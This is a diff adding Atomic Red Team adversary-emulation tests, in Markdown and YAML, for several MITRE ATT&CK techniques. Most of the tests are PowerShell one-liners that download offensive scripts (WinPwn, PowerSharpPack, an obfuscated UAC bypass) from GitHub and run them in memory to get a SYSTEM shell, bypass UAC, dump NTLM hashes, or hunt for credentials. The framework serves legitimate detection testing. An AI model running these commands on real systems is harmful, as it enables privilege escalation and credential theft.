+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #2 - Lolbin Jsc.exe compile javascript to dll
+Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
+https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+https://www.phpied.com/make-your-javascript-a-windows-exe/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 3fc9fea2-871d-414d-8ef6-02e85e322b80
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| filename | Location of the project file | Path | PathToAtomicsFolder&#92;T1127&#92;src&#92;LibHello.js|
+| jscpath | Default location of jsc.exe | Path | C:&#92;Windows&#92;Microsoft.NET&#92;Framework&#92;v4.0.30319|
+| jscname | Default name of jsc | Path | jsc.exe|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+copy #{filename} %TEMP%\LibHello.js
+#{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
+```
+
+#### Cleanup Commands:
+```cmd
+del %TEMP%\LibHello.js
+del %TEMP%\LibHello.dll
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: JavaScript code file must exist on disk at specified location (#{filename})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{filename}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}"
+```
+
+
+
+
+<br/>

atomics/T1127/T1127.yaml

@@ -0,0 +1,80 @@
+attack_technique: T1127
+display_name: 'Trusted Developer Utilities Proxy Execution'
+atomic_tests:
+- name: Lolbin Jsc.exe compile javascript to exe
+  auto_generated_guid: 1ec1c269-d6bd-49e7-b71b-a461f7fa7bc8
+  description: |
+    Use jsc.exe to compile javascript code stored in scriptfile.js and output scriptfile.exe.
+    https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+    https://www.phpied.com/make-your-javascript-a-windows-exe/
+  supported_platforms:
+  - windows
+  input_arguments:
+    filename:
+      description: Location of the project file
+      type: Path
+      default: PathToAtomicsFolder\T1127\src\hello.js
+    jscpath:
+      description: Default location of jsc.exe
+      type: Path
+      default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
+    jscname:
+      description: Default name of jsc
+      type: Path
+      default: jsc.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      JavaScript code file must exist on disk at specified location (#{filename})
+    prereq_command: |
+      if (Test-Path #{filename}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/hello.js" -OutFile "#{filename}"
+  executor:
+    command: |
+      copy #{filename} %TEMP%\hello.js
+      #{jscpath}\#{jscname} %TEMP%\hello.js
+    cleanup_command: |
+      del %TEMP%\hello.js
+      del %TEMP%\hello.exe
+    name: command_prompt
+
+- name: Lolbin Jsc.exe compile javascript to dll
+  auto_generated_guid: 3fc9fea2-871d-414d-8ef6-02e85e322b80
+  description: |
+    Use jsc.exe to compile javascript code stored in Library.js and output Library.dll.
+    https://lolbas-project.github.io/lolbas/Binaries/Jsc/
+    https://www.phpied.com/make-your-javascript-a-windows-exe/
+  supported_platforms:
+  - windows
+  input_arguments:
+    filename:
+      description: Location of the project file
+      type: Path
+      default: PathToAtomicsFolder\T1127\src\LibHello.js
+    jscpath:
+      description: Default location of jsc.exe
+      type: Path
+      default: C:\Windows\Microsoft.NET\Framework\v4.0.30319
+    jscname:
+      description: Default name of jsc
+      type: Path
+      default: jsc.exe
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      JavaScript code file must exist on disk at specified location (#{filename})
+    prereq_command: |
+      if (Test-Path #{filename}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{filename}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1127/src/LibHello.js" -OutFile "#{filename}"
+  executor:
+    command: |
+      copy #{filename} %TEMP%\LibHello.js
+      #{jscpath}\#{jscname} /t:library %TEMP%\LibHello.js
+    cleanup_command: |
+      del %TEMP%\LibHello.js
+      del %TEMP%\LibHello.dll
+    name: command_prompt  

atomics/T1127/src/LibHello.js

@@ -0,0 +1,9 @@
+package LibHello {
+    class Hello {
+        function say() {
+            var d = new Date();
+            var n = Math.random();
+            return 'Hello, \\ntoday is ' + d + '\\nand this is random - ' + n;
+        }
+    }
+}

atomics/T1127/src/hello.js

@@ -0,0 +1,3 @@
+var d = new Date();
+var n = Math.random();
+print('Hello, \\ntoday is ' + d + '\\nand this is random - ' + n);

atomics/T1134.002/T1134.002.md

@@ -8,6 +8,8 @@ Creating processes with a different token may require the credentials of the tar
 
 - [Atomic Test #1 - Access Token Manipulation](#atomic-test-1---access-token-manipulation)
 
+- [Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique](#atomic-test-2---winpwn---get-system-shell---pop-system-shell-using-token-manipulation-technique)
+
 
 <br/>
 
@@ -42,4 +44,32 @@ $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromP
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique
+Get SYSTEM shell - Pop System Shell using Token Manipulation technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ccf4ac39-ec93-42be-9035-90e2f26bcd92
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
+```
+
+
+
+
+
+
 <br/>

atomics/T1134.002/T1134.002.yaml

@@ -17,4 +17,13 @@ atomic_tests:
       Get-Process | Select ProcessName,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
       $PathToAtomicsFolder\T1134.002\src\GetToken.ps1; [MyProcess]::CreateProcessFromParent((Get-Process lsass).Id,"cmd.exe")
     name: powershell
-    elevation_required: true
+    elevation_required: true
+- name: WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique
+  auto_generated_guid: ccf4ac39-ec93-42be-9035-90e2f26bcd92
+  description: Get SYSTEM shell - Pop System Shell using Token Manipulation technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Get-System-Techniques/master/TokenManipulation/Get-WinlogonTokenSystem.ps1');Get-WinLogonTokenSystem
+    name: powershell    

atomics/T1135/T1135.md

@@ -20,6 +20,8 @@ File sharing over a Windows network occurs over the SMB protocol. (Citation: Wik
 
 - [Atomic Test #7 - PowerView ShareFinder](#atomic-test-7---powerview-sharefinder)
 
+- [Atomic Test #8 - WinPwn - shareenumeration](#atomic-test-8---winpwn---shareenumeration)
+
 
 <br/>
 
@@ -279,4 +281,34 @@ Invoke-WebRequest "https://raw.githubusercontent.com/darkoperator/Veil-PowerView
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - WinPwn - shareenumeration
+Network share enumeration using the shareenumeration function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 987901d1-5b87-4558-a6d9-cffcabc638b8
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+shareenumeration -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>

atomics/T1135/T1135.yaml

@@ -121,3 +121,14 @@ atomic_tests:
       Import-Module $env:TEMP\PowerView.ps1
       Invoke-ShareFinder #{parameters}
     name: powershell
+- name: WinPwn - shareenumeration
+  auto_generated_guid: 987901d1-5b87-4558-a6d9-cffcabc638b8
+  description: Network share enumeration using the shareenumeration function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      shareenumeration -noninteractive -consoleoutput
+    name: powershell

atomics/T1187/T1187.md

@@ -17,6 +17,8 @@ There are several different ways this can occur. (Citation: Osanda Stealing NetN
 
 - [Atomic Test #1 - PetitPotam](#atomic-test-1---petitpotam)
 
+- [Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS](#atomic-test-2---winpwn---powersharppack---retrieving-ntlm-hashes-without-touching-lsass)
+
 
 <br/>
 
@@ -67,4 +69,33 @@ Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd5
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7f06b25c-799e-40f1-89db-999c9cc84317
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+```
+
+
+
+
+
+
 <br/>

atomics/T1187/T1187.yaml

@@ -39,3 +39,13 @@ atomic_tests:
     command: |
       & "#{petitpotam_path}" #{captureServerIP} #{targetServerIP} #{efsApi}
       Write-Host "End of PetitPotam attack"
+- name: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS
+  auto_generated_guid: 7f06b25c-799e-40f1-89db-999c9cc84317
+  description: PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
+      Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"
+    name: powershell

atomics/T1204.002/T1204.002.md

@@ -26,6 +26,8 @@ While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently
 
 - [Atomic Test #9 - Office Generic Payload Download](#atomic-test-9---office-generic-payload-download)
 
+- [Atomic Test #10 - LNK Payload Download](#atomic-test-10---lnk-payload-download)
+
 
 <br/>
 
@@ -584,4 +586,43 @@ Write-Host "You will need to install Microsoft #{ms_product} manually to meet th
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #10 - LNK Payload Download
+This lnk files invokes powershell to download putty from the internet and opens the file. https://twitter.com/ankit_anubhav/status/1518932941090410496
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 581d7521-9c4b-420e-9695-2aec5241167f
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+$file1 = "$env:Temp\test10.lnk"
+Start-Process $file1
+Start-Sleep -s 10
+taskkill /IM a.exe /F
+```
+
+#### Cleanup Commands:
+```powershell
+$file1 = "$env:Temp\test10.lnk"
+$file2 = "$env:Temp\a.exe"
+Remove-Item $file1 -ErrorAction Ignore
+Remove-Item $file2 -ErrorAction Ignore
+```
+
+
+
+
+
 <br/>

atomics/T1204.002/T1204.002.yaml

@@ -388,3 +388,23 @@ atomic_tests:
       Invoke-MalDoc -macroCode $macroCode -officeProduct "#{ms_product}"
     cleanup_command: |
       Remove-Item "C:\Users\$env:username\Desktop\#{file_name}" -ErrorAction Ignore
+- name: LNK Payload Download
+  auto_generated_guid: 581d7521-9c4b-420e-9695-2aec5241167f
+  description: 
+    This lnk files invokes powershell to download putty from the internet and opens the file.
+    https://twitter.com/ankit_anubhav/status/1518932941090410496 
+  supported_platforms:
+    - windows
+  executor:
+    command: |
+      Invoke-WebRequest -OutFile $env:Temp\test10.lnk "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/bin/test10.lnk"
+      $file1 = "$env:Temp\test10.lnk"
+      Start-Process $file1
+      Start-Sleep -s 10
+      taskkill /IM a.exe /F
+    cleanup_command: |-
+      $file1 = "$env:Temp\test10.lnk"
+      $file2 = "$env:Temp\a.exe"
+      Remove-Item $file1 -ErrorAction Ignore
+      Remove-Item $file2 -ErrorAction Ignore
+    name: powershell

atomics/T1218/T1218.md

@@ -24,6 +24,10 @@
 
 - [Atomic Test #10 - Load Arbitrary DLL via Wuauclt (Windows Update Client)](#atomic-test-10---load-arbitrary-dll-via-wuauclt-windows-update-client)
 
+- [Atomic Test #11 - Lolbin Gpscript logon option](#atomic-test-11---lolbin-gpscript-logon-option)
+
+- [Atomic Test #12 - Lolbin Gpscript startup option](#atomic-test-12---lolbin-gpscript-startup-option)
+
 
 <br/>
 
@@ -503,4 +507,64 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/at
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #11 - Lolbin Gpscript logon option
+Executes logon scripts configured in Group Policy.
+https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+Gpscript /logon
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #12 - Lolbin Gpscript startup option
+Executes startup scripts configured in Group Policy
+https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+Gpscript /startup
+```
+
+
+
+
+
+
 <br/>

atomics/T1218/T1218.yaml

@@ -283,3 +283,27 @@ atomic_tests:
     cleanup_command: |-
       taskkill /f /im calculator.exe > nul 2>&1
     name: command_prompt 
+- name: Lolbin Gpscript logon option
+  auto_generated_guid: 5bcda9cd-8e85-48fa-861d-b5a85d91d48c
+  description: |
+    Executes logon scripts configured in Group Policy.
+    https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+    https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+  supported_platforms:
+    - windows
+  executor:
+    command: |
+      Gpscript /logon
+    name: command_prompt
+- name: Lolbin Gpscript startup option
+  auto_generated_guid: f8da74bb-21b8-4af9-8d84-f2c8e4a220e3
+  description: |
+    Executes startup scripts configured in Group Policy
+    https://lolbas-project.github.io/lolbas/Binaries/Gpscript/
+    https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/
+  supported_platforms:
+    - windows
+  executor:
+    command: |
+      Gpscript /startup
+    name: command_prompt

atomics/T1518/T1518.md

@@ -12,6 +12,12 @@ Adversaries may attempt to enumerate software for a variety of reasons, such as
 
 - [Atomic Test #3 - Find and Display Safari Browser Version](#atomic-test-3---find-and-display-safari-browser-version)
 
+- [Atomic Test #4 - WinPwn - Dotnetsearch](#atomic-test-4---winpwn---dotnetsearch)
+
+- [Atomic Test #5 - WinPwn - DotNet](#atomic-test-5---winpwn---dotnet)
+
+- [Atomic Test #6 - WinPwn - powerSQL](#atomic-test-6---winpwn---powersql)
+
 
 <br/>
 
@@ -100,4 +106,94 @@ Adversaries may attempt to get a listing of non-security related software that i
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #4 - WinPwn - Dotnetsearch
+Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7e79a1b6-519e-433c-ad55-3ff293667101
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Dotnetsearch -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #5 - WinPwn - DotNet
+Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 10ba02d0-ab76-4f80-940d-451633f24c5b
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+dotnet -consoleoutput -noninteractive
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - powerSQL
+Start PowerUpSQL Checks using powerSQL function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0bb64470-582a-4155-bde2-d6003a95ed34
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+powerSQL -noninteractive -consoleoutput
+```
+
+
+
+
+
+
 <br/>

atomics/T1518/T1518.yaml

@@ -37,4 +37,37 @@ atomic_tests:
     elevation_required: false
     command: |
       /usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
-      /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
+      /usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
+- name: WinPwn - Dotnetsearch
+  auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
+  description: Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      Dotnetsearch -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - DotNet
+  auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
+  description: Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      dotnet -consoleoutput -noninteractive
+    name: powershell
+- name: WinPwn - powerSQL
+  auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
+  description: Start PowerUpSQL Checks using powerSQL function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      powerSQL -noninteractive -consoleoutput
+    name: powershell

atomics/T1548.002/T1548.002.md

@@ -46,6 +46,14 @@ Another bypass is possible through some lateral movement techniques if credentia
 
 - [Atomic Test #17 - UACME Bypass Method 61](#atomic-test-17---uacme-bypass-method-61)
 
+- [Atomic Test #18 - WinPwn - UAC Magic](#atomic-test-18---winpwn---uac-magic)
+
+- [Atomic Test #19 - WinPwn - UAC Bypass ccmstp technique](#atomic-test-19---winpwn---uac-bypass-ccmstp-technique)
+
+- [Atomic Test #20 - WinPwn - UAC Bypass DiskCleanup technique](#atomic-test-20---winpwn---uac-bypass-diskcleanup-technique)
+
+- [Atomic Test #21 - WinPwn - UAC Bypass DccwBypassUAC technique](#atomic-test-21---winpwn---uac-bypass-dccwbypassuac-technique)
+
 
 <br/>
 
@@ -967,4 +975,122 @@ Remove-Item $env:TEMP\uacme.zip -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #18 - WinPwn - UAC Magic
+UAC bypass using Magic technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #19 - WinPwn - UAC Bypass ccmstp technique
+UAC bypass using ccmstp technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** f3c145f9-3c8d-422c-bd99-296a17a8f567
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #20 - WinPwn - UAC Bypass DiskCleanup technique
+UAC bypass using DiskCleanup technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 1ed67900-66cd-4b09-b546-2a0ef4431a0c
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #21 - WinPwn - UAC Bypass DccwBypassUAC technique
+UAC Bypass DccwBypassUAC technique via function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2b61977b-ae2d-4ae4-89cb-5c36c89586be
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
+```
+
+
+
+
+
+
 <br/>

atomics/T1548.002/T1548.002.yaml

@@ -556,3 +556,45 @@ atomic_tests:
       powershell Stop-Process -Name cmd -Force -ErrorAction Ignore
       powershell Stop-Process -Name mmc -Force -ErrorAction Ignore
     name: command_prompt
+- name: WinPwn - UAC Magic
+  auto_generated_guid: 964d8bf8-37bc-4fd3-ba36-ad13761ebbcc
+  description: UAC bypass using Magic technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique magic
+    name: powershell
+- name: WinPwn - UAC Bypass ccmstp technique
+  auto_generated_guid: f3c145f9-3c8d-422c-bd99-296a17a8f567
+  description: UAC bypass using ccmstp technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      UACBypass -noninteractive -command "C:\windows\system32\calc.exe" -technique ccmstp
+    name: powershell
+- name: WinPwn - UAC Bypass DiskCleanup technique
+  auto_generated_guid: 1ed67900-66cd-4b09-b546-2a0ef4431a0c
+  description: UAC bypass using DiskCleanup technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      UACBypass -noninteractive -command "C:\windows\system32\cmd.exe" -technique DiskCleanup
+    name: powershell
+- name: WinPwn - UAC Bypass DccwBypassUAC technique
+  auto_generated_guid: 2b61977b-ae2d-4ae4-89cb-5c36c89586be
+  description: UAC Bypass DccwBypassUAC technique via function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/Creds/master/obfuscatedps/dccuac.ps1')
+    name: powershell

atomics/T1552.001/T1552.001.md

@@ -18,6 +18,18 @@ In cloud and/or containerized environments, authenticated user and service accou
 
 - [Atomic Test #5 - Find and Access Github Credentials](#atomic-test-5---find-and-access-github-credentials)
 
+- [Atomic Test #6 - WinPwn - sensitivefiles](#atomic-test-6---winpwn---sensitivefiles)
+
+- [Atomic Test #7 - WinPwn - Snaffler](#atomic-test-7---winpwn---snaffler)
+
+- [Atomic Test #8 - WinPwn - powershellsensitive](#atomic-test-8---winpwn---powershellsensitive)
+
+- [Atomic Test #9 - WinPwn - passhunt](#atomic-test-9---winpwn---passhunt)
+
+- [Atomic Test #10 - WinPwn - SessionGopher](#atomic-test-10---winpwn---sessiongopher)
+
+- [Atomic Test #11 - WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials](#atomic-test-11---winpwn---loot-local-credentials---aws-microsoft-azure-and-google-compute-credentials)
+
 
 <br/>
 
@@ -166,4 +178,194 @@ for file in $(find / -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #6 - WinPwn - sensitivefiles
+Search for sensitive files on this local system using the SensitiveFiles function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 114dd4e3-8d1c-4ea7-bb8d-8d8f6aca21f0
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+sensitivefiles -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #7 - WinPwn - Snaffler
+Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** fdd0c913-714b-4c13-b40f-1824d6c015f2
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+Snaffler -noninteractive -consoleoutput
+```
+
+
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #8 - WinPwn - powershellsensitive
+Check Powershell event logs for credentials or other sensitive information via winpwn powershellsensitive function.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 75f66e03-37d3-4704-9520-3210efbe33ce
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
